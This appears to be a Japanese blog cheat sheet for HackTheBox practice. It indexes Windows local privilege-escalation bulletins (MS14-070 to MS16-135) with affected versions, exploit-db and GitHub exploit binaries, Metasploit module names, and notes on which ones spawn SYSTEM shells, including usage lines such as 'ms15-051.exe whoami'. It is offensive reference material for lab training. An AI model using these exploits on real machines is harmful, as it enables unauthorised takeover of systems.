Affected Product: TCP/IP Protocol Driver Affected Version: 5.2.3790.4573 Platform: Microsoft Windows Server 2003 Service Pack 2 Architecture: x86, x64, Itanium
github
35936.exe 37755.exe
github.com
metasploit
exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys can allow a local attacker to trigger a NULL pointer dereference by using a specially crafted IOCTL. This flaw can be abused to elevate privileges to SYSTEM.
more information
Granny privesc (MS14-070) WITHOUT meterpreter
MS15_004 (medium)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3019978) Windows RT 8.1[1] (3019978) Windows Server 2008 R2 for x64-based Systems Service Pack 1
exploit-db
Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)
Protected Mode (Windows 7) / 32 bits
www.exploit-db.com
github
no??
metasploit
exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
more information
MS15-010 (meduim)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3013455) Windows RT 8.1[1] (3013455)
exploit-db
Microsoft Windows - Local Privilege Escalation (MS15-010)
www.exploit-db.com
Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)
# Version: Windows 8.1 (x64) # Tested on: Windows 8.1 (x64)
have exe URL
www.exploit-db.com
github
39035.exe
github.com
metasploit
no
more information
MS15-051 (high)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3045171) Windows RT 8.1[1] (3045171) Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
Title : ClientCopyImage Win32k CVEID : 2015-1701, 2015-2433
exploit-db
Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)
Link : https://www.exploit-db.com/exploits/37367/
www.exploit-db.com
Microsoft Windows - Local Privilege Escalation (MS15-051)
have exe URL
www.exploit-db.com
github
37049-32.exe Taihou32.exe Taihou64.exe ms15-051.exe ms15-051x64.exe
ms15-051x64.exe works!!
github.com
have exe URL
ms15-051/Win32/ms15-051.exe works!!!
ms15-051/x64/ms15-051.exe
usage ms15-051.exe whoami
github.com
metasploit
exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
more information
MS15-076 (medium)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Server 2003 R2 Service Pack 2 Windows Server 2003 R2 x64 Edition Service Pack 2 Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3067505) Windows RT 8.1[1] (3067505)
exploit-db
Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)
Copies a file to any privileged location on disk Usage: trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll Exploit can only be one once every 2-3 minutes. This is because RPC can be help up by LocalSystem Tested on x64/x86 Windows 7/8.1 The destination file can't already exist
github
Trebuchet.exe Microsoft.VisualStudio.OLE.Interop.dll
github.com
metasploit
no
more information
MS15-078 (meduim)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3079904) Windows RT 8.1[1] (3079904) Windows 10 for 32-bit Systems[1] (3074683) Windows 10 for x64-based Systems[1] (3074683)
MS15-078 : Font Driver Buffer Overflow This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by the hacking team and disclosed on the july data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64.
This module has been tested successfully on vulnerable builds of Windows 8.1 x64.
exploit-db
Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)
www.exploit-db.com
github
no??
metasploit
exploit/windows/local/ms15_078_atmfd_bof 2015-07-11 manual MS15-078 Microsoft Windows Font Driver Buffer Overflow
more information
MS15-102 (low)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3082089) Windows RT[1] (3084135) Windows RT 8.1[1] (3082089) Windows RT 8.1[1] (3084135) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
exploit-db
have exe URL
38202/bin/CreateObjectTaskCPP.exe
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
/root/Documents/OSCP-LABO/HTB/Arctic/
www.exploit-db.com
have ps1 URL
38200.ps1
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
Platform: Windows 8.1 Update, looks like it should work on 7 and 10 as well
www.exploit-db.com
have exe URL
38201/bin/CreateObjectTaskCPP.exe
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
Platform: Windows 8.1 Update (I don’t believe it’s available in earlier Windows versions)
www.exploit-db.com
github
no??
metasploit
no
more information
MS16-014 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1[1] (3126587) Windows RT 8.1[1] (3126593) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
exploit-db
Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)
# Version: Windows 7 SP1 x86 # Tested on: Windows 7 SP1 x86
Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)
# Tested on: Windows 7 Professional (x32/x64) # CVE : CVE-2016-0049 ???????????????????????????? txt
github
ms16-014.rar ms16-014.exe ms16-014.exe
usage ms16-014.exe whoami ???????
github.com
metasploit
exploit/windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Windows WMI Recieve Notification Exploit
more information
MS16-016 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important Title : 'mrxdav.sys' WebDAV MSBulletin : MS16-016 CVEID : 2016-0051
exploit-db
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
have exe URL
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
# Version:WebDAV on Windows 7 84x
spawn SYSTEM shell in **current** window<br>
https://www.exploit-db.com/exploits/39788
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC<brhttps://www.exploit-db.com/exploits/39788/ spawn SYSTEM shell in **new** window
https://www.exploit-db.com/exploits/39432
github
BSoD.exe EoP.exe
spawn SYSTEM shell in new window
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016
metasploit
exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.
more information
MS16-032 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1 [1] (3139914) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems
exploit-db
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)
www.exploit-db.com
Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)
www.exploit-db.com
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)
www.exploit-db.com
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)
www.exploit-db.com
github
x86/ms16-032.exe x64/ms16-032.exe MS16-032.ps1
spawn SYSTEM shell in new window
github.com
metasploit
exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. This module exploits the lack of sanitization of standard handles in Windows Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
more information
MS16-034 (very low)
affected version
(XP/Vista/Win7/Win8/2000/2003/2008/2012)
Title : Windows Kernel-Mode Drivers EoP MSBulletin : MS16-034 CVEID : 2016-0093/94/95/96
exploit-db
no??
github
FillRgn_BSoD.cpp MS16-034-exp.cpp
cannot compile
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1github.com
metasploit
no
more information
MS16-075 (medium)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems
Hot potato
exploit-db
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)
seems not work....????
www.exploit-db.com
github
Tater.ps1 (seems works) potato.exe ms16-075.rb (metasploit module)
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
poc.py attack.py constant.py httpserver.py secretsdump.py smbclient.py webclient.py
????
github.com
metasploit
above
more information
MS16-098 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1[1] (3177725) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems
exploit-db
Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)
.c have exe URL
41020.exe
www.exploit-db.com
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)
have exe URL
MS16-098.exe
www.exploit-db.com
github
bfill.exe
github.com
Windows 8.1 x64 Exploit for MS16-098 RNGOBJ_Integer_Overflow
have bfill.exe
github.com
metasploit
no
more information
MS16-135 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows Server 2016 for x64-based Systems
Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255
exploit-db
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)
have exe URL
41015.exe
www.exploit-db.com
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (1)
40823/code/ASLRSideChannelAttack/compiled/ASLRSideChannelAttack.exe
have exe URL
www.exploit-db.com
github
MS16-135
https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sgithub.com
41015.exe MS16-135.ps1 SetWindowLongPtr_Exploit.exe
spawn SYSTEM shell in current window
github.com
MS16-135.ps1
github.com
metasploit
no
more information
最後に
HackTheBoxのWindowsのPEってKernelExploitであることが多いですよね。その時に、毎回SuggesterでExploitを探すうちにそれらを覚えちゃう方が早いと思ったのでこういうのを作りました。
あと、LinuxのsudoコマンドのExploitについても同じようなチートシートを自分は作ってます。
これらの30種類の中で、HTBで頻出だと思うのはMS10-092 MS11-046 MS15-051 MS16-032 あたりでしょうか。もちろんこれら以外もありますが。